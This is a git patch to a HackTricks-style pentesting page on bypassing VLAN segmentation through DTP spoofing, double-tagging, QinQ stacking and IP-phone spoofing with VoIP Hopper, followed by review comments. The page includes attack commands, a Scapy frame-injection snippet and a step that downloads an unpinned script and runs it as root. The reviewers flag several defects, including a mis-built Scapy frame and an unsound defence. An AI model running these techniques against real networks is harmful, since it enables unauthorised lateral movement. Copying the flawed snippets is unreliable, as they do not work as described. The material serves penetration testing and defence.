From 1d5db450d19f720f6459d5b6ff88b03cc08a7c3f Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Thu, 7 Aug 2025 08:30:36 +0000 Subject: [PATCH] Add content from: Research Update: Enhanced src/generic-methodologies-and-reso... --- .../lateral-vlan-segmentation-bypass.md | 72 +++++++++++++------ 1 file changed, 50 insertions(+), 22 deletions(-) diff --git a/src/generic-methodologies-and-resources/pentesting-network/lateral-vlan-segmentation-bypass.md b/src/generic-methodologies-and-resources/pentesting-network/lateral-vlan-segmentation-bypass.md index 5ebe43473..250e30159 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/lateral-vlan-segmentation-bypass.md +++ b/src/generic-methodologies-and-resources/pentesting-network/lateral-vlan-segmentation-bypass.md @@ -31,14 +31,18 @@ Switching to trunk mode will temporarily disrupt connectivity, but this can be r Virtual interfaces are then created, assigned VLAN IDs, and activated: ```bash +# Legacy (vconfig) – still works but deprecated in modern kernels sudo vconfig add eth0 10 sudo vconfig add eth0 20 sudo vconfig add eth0 50 sudo vconfig add eth0 60 -sudo ifconfig eth0.10 up -sudo ifconfig eth0.20 up -sudo ifconfig eth0.50 up -sudo ifconfig eth0.60 up + +# Modern (ip-link – preferred) +sudo modprobe 8021q +sudo ip link add link eth0 name eth0.10 type vlan id 10 +sudo ip link add link eth0 name eth0.20 type vlan id 20 +sudo ip link set eth0.10 up +sudo ip link set eth0.20 up ``` Subsequently, an address request is made via DHCP. Alternatively, in cases where DHCP is not viable, addresses can be manually configured: 
@@ -46,14 +50,12 @@ Subsequently, an address request is made via DHCP. Alternatively, in cases where ```bash sudo dhclient -v eth0.10 sudo dhclient -v eth0.20 -sudo dhclient -v eth0.50 -sudo dhclient -v eth0.60 ``` Example for manually setting a static IP address on an interface (VLAN 10): ```bash -sudo ifconfig eth0.10 10.10.10.66 netmask 255.255.255.0 +sudo ip addr add 10.10.10.66/24 dev eth0.10 ``` Connectivity is tested by initiating ICMP requests to the default gateways for VLANs 10, 20, 50, and 60. @@ -81,18 +83,18 @@ $ git clone https://github.com/fleetcaptain/dtp-spoof.git $ sudo python3 dtp-spoof/dtp-spoof.py -i eth0 --desirable ``` -Once the port switches to trunk you can create 802.1Q sub-interfaces and pivot exactly as shown in the previous section. Modern Linux kernels no longer require *vconfig*; instead use *ip link*: +Recon helper (passively fingerprint the port’s DTP state): ```bash -sudo modprobe 8021q -sudo ip link add link eth0 name eth0.30 type vlan id 30 -sudo ip addr add 10.10.30.66/24 dev eth0.30 -sudo ip link set eth0.30 up +$ wget https://gist.githubusercontent.com/mgeeky/3f678d385984ba0377299a844fb793fa/raw/dtpscan.py +$ sudo python3 dtpscan.py -i eth0 ``` +Once the port switches to trunk you can create 802.1Q sub-interfaces and pivot exactly as shown in the previous section. + ### 2. Double-Tagging (Native-VLAN Abuse) -If the attacker sits on the **native (untagged) VLAN**, a crafted frame with *two* 802.1Q headers can "hop" to a second VLAN even when the port is locked in access mode. Tooling such as **VLANPWN DoubleTagging.py** (2022-2024 refresh) automates the injection: +If the attacker sits on the **native (untagged) VLAN**, a crafted frame with *two* 802.1Q headers can hop to a second VLAN even when the port is locked in access mode. Tooling such as **VLANPWN DoubleTagging.py** (2022-2025 refresh) automates the injection: ```bash python3 DoubleTagging.py \ 
@@ -103,15 +105,9 @@ python3 DoubleTagging.py \ --attacker 10.10.1.54 ``` -Packet walk-through: -1. Outer tag (1) is stripped by the first switch because it matches the native VLAN. -2. Inner tag (20) is now exposed; the frame is forwarded onto the trunk towards VLAN 20. - -The technique still works in 2025 on networks that leave the native VLAN at the default and accept untagged frames . - ### 3. QinQ (802.1ad) Stacking -Many enterprise cores support *Q-in-Q* service provider encapsulation. Where permitted, an attacker can tunnel arbitrary 802.1Q-tagged traffic inside a provider (S-tag) to cross security zones. Capture for 802.1ad ethertype 0x88a8 and attempt to pop the outer tag with Scapy: +Many enterprise cores support *Q-in-Q* service-provider encapsulation. Where permitted, an attacker can tunnel arbitrary 802.1Q-tagged traffic inside a provider (S-tag) to cross security zones. Capture for ethertype `0x88a8` and attempt to pop the outer tag with Scapy: ```python from scapy.all import * 
@@ -122,6 +118,24 @@ frame = Dot1Q(type=0x88a8, vlan=outer)/payload sendp(frame, iface="eth0") ``` +### 4. Voice-VLAN Hijacking via LLDP/CDP (IP-Phone Spoofing) + +Corporate access ports often sit in an *“access + voice”* configuration: untagged data VLAN for the workstation and a tagged voice VLAN advertised through CDP or LLDP-MED. By impersonating an IP phone the attacker can automatically discover and hop into the VoIP VLAN—even when DTP is disabled. + +*VoIP Hopper* (packaged in Kali 2025.2) supports CDP, DHCP options **176/242**, and full LLDP-MED spoofing: + +```bash +# One-shot discovery & hop +sudo voiphopper -i eth0 -f cisco-7940 + +# Interactive Assessment Mode (passive sniff → auto-hop when VVID learnt) +sudo voiphopper -i eth0 -z + +# Result: new sub-interface eth0. with a DHCP or static address inside the voice VLAN +``` + +The technique bypasses data/voice separation and is extremely common on enterprise edge switches in 2025 because LLDP auto-policy is enabled by default on many models . + --- ## Defensive Recommendations 
@@ -129,8 +143,20 @@ sendp(frame, iface="eth0") 1. Disable DTP on all user-facing ports: `switchport mode access` + `switchport nonegotiate`. 2. Change the native VLAN on every trunk to an **unused, black-hole VLAN** and tag it: `vlan dot1q tag native`. 3. Prune unnecessary VLANs on trunks: `switchport trunk allowed vlan 10,20`. -4. Enforce port security, DHCP snooping & dynamic ARP inspection to limit rogue Layer-2 activity. -5. Prefer private-VLANs or L3 segmentation instead of relying solely on 802.1Q separation. +4. Enforce port security, DHCP snooping, dynamic ARP inspection **and 802.1X** to limit rogue Layer-2 activity. +5. Disable LLDP-MED auto voice policies (or lock them to authenticated MAC OUIs) if IP-phone spoofing isn’t required. +6. Prefer private-VLANs or L3 segmentation instead of relying solely on 802.1Q separation. + +--- + +## Real-World Vendor Vulnerabilities (2022-2024) + +Even a perfectly hardened switch configuration can still be undermined by firmware bugs. Recent examples include: + +* **CVE-2022-20728† – Cisco Aironet/Catalyst Access Points** allow injection from the native VLAN into non-native WLAN VLANs, bypassing wired/wireless segmentation . +* **CVE-2024-20465 (Cisco IOS Industrial Ethernet)** permits ACL bypass on SVIs after toggling Resilient Ethernet Protocol, leaking traffic between VRFs/VLANs. Patch 17.9.5 or later. + +Always monitor the vendor advisories for VLAN-related bypass/ACL issues and keep infrastructure images current. --- @@ -139,5 +165,7 @@ sendp(frame, iface="eth0") - [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9) - VLANPWN attack toolkit – - Twingate "What is VLAN Hopping?" (Aug 2024) – +- VoIP Hopper project – +- Cisco Advisory “cisco-sa-apvlan-TDTtb4FY” – {{#include ../../banners/hacktricks-training.md}}
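Review bot: in the first hunk (@@ -31,14 +31,18 @@) the legacy vconfig block still adds eth0.10, eth0.20, eth0.50 and eth0.60, but the four `ifconfig eth0.x up` lines are removed and the new ip-link block only creates and activates eth0.10 and eth0.20, so a reader following the vconfig path ends up with four sub-interfaces that are never brought up, and VLANs 50/60 exist in one block but not the other. Either drop 50/60 from the vconfig lines (consistent with the dhclient hunk) or add `sudo ip link set eth0.50 up` and `sudo ip link set eth0.60 up`. Minor: the comment "deprecated in modern kernels" is misleading, since the 8021q kernel module is unchanged and it is the vconfig userspace utility that distributions dropped; "deprecated userspace tool, use ip link" would be accurate.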
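Review bot: in the dhclient hunk (@@ -46,14 +50,12 @@) removing `sudo dhclient -v eth0.50` and `sudo dhclient -v eth0.60` leaves the unchanged context sentence "Connectivity is tested by initiating ICMP requests to the default gateways for VLANs 10, 20, 50, and 60" pointing at sub-interfaces that are no longer configured anywhere in the page; either reduce that sentence to VLANs 10 and 20 or keep the two dhclient lines. The `sudo ip addr add 10.10.10.66/24 dev eth0.10` replacement is fine on its own because the earlier hunk already brings eth0.10 up.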
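Review bot: in the DTP hunk (@@ -81,18 +83,18 @@) the new "Recon helper" fetches `https://gist.githubusercontent.com/mgeeky/.../raw/dtpscan.py` and immediately runs it with `sudo python3 dtpscan.py -i eth0`; a raw gist URL without a revision component always serves whatever the gist currently contains, so pin it to a specific revision (`.../raw/<revision>/dtpscan.py`) or at least tell the reader to read the script before executing it as root. Ordering point: a block described as "passively fingerprint the port's DTP state" is placed after the active `dtp-spoof.py -i eth0 --desirable` command; swap the two so the section reads recon first, then negotiation, then the "Once the port switches to trunk..." sentence that was moved below.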
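Review bot: in the double-tagging/QinQ hunk (@@ -103,15 +105,9 @@) deleting the two-step "Packet walk-through" removes the only explanation of why the attack requires sitting on the native VLAN (the outer tag is stripped because it matches the native VLAN, which exposes the inner tag), and both the heading "Native-VLAN Abuse" and defensive recommendation 2 (tag the native VLAN) depend on that reasoning; keep the two numbered steps and drop only the unsourced "still works in 2025" sentence with its dangling " ." citation residue. In the rewritten QinQ sentence, "Capture for ethertype `0x88a8` and attempt to pop the outer tag with Scapy" describes capturing and stripping a tag, but the snippet it introduces builds a frame and ends with `sendp(frame, iface="eth0")`; additionally, in Scapy the `type` field of `Dot1Q` is the ethertype of the encapsulated (next) header, not the TPID of that tag, so `Dot1Q(type=0x88a8, vlan=outer)` does not produce an 802.1ad S-tag at the outer position (the first tag's TPID comes from the preceding `Ether` layer's `type`, or from the dedicated `Dot1AD` layer). Reconcile the prose with what the code does and re-check the snippet against Scapy's Dot1Q/Dot1AD field semantics.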
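Review bot: in the voice-VLAN hunk (@@ -122,6 +118,24 @@) the comment `# Result: new sub-interface eth0. with a DHCP or static address inside the voice VLAN` has lost the VLAN-ID portion of the interface name; write it as a placeholder such as `eth0.<VVID>`. The `-f cisco-7940` option in `sudo voiphopper -i eth0 -f cisco-7940` cannot be confirmed from the visible text, so check it against voiphopper's current usage output before publishing. The closing sentence ends in "on many models ." (a dropped citation marker), and "VoIP VLAN—even" uses an em-dash where the rest of the page uses plain punctuation; fix both, and either cite the claim that LLDP auto-policy is enabled by default on many models or soften it.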
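Review bot: in the recommendations hunk (@@ -129,8 +143,20 @@) item 5, "lock them to authenticated MAC OUIs", contradicts the new section 4 it responds to: a MAC OUI is attacker-chosen (impersonating a phone is exactly what the VoIP Hopper section describes), so OUI matching is not authentication. Tie voice-VLAN assignment to the 802.1X/MAB authorisation that item 4 already introduces instead. In the vulnerability list, `CVE-2022-20728†` carries a dagger with no matching footnote and both bullets end with " ." citation residue; remove the dagger or add its footnote and fix the punctuation. "Patch 17.9.5 or later" should name the software train it refers to so the version number is unambiguous.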
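Review bot: in the references hunk (@@ -139,5 +165,7 @@) both new entries, "VoIP Hopper project –" and "Cisco Advisory “cisco-sa-apvlan-TDTtb4FY” –", end with a dash and no URL, the same defect as the existing "VLANPWN attack toolkit –" and Twingate lines; add the links, and link the CVE-2022-20728 bullet above to the advisory ID cited here so the two sections agree.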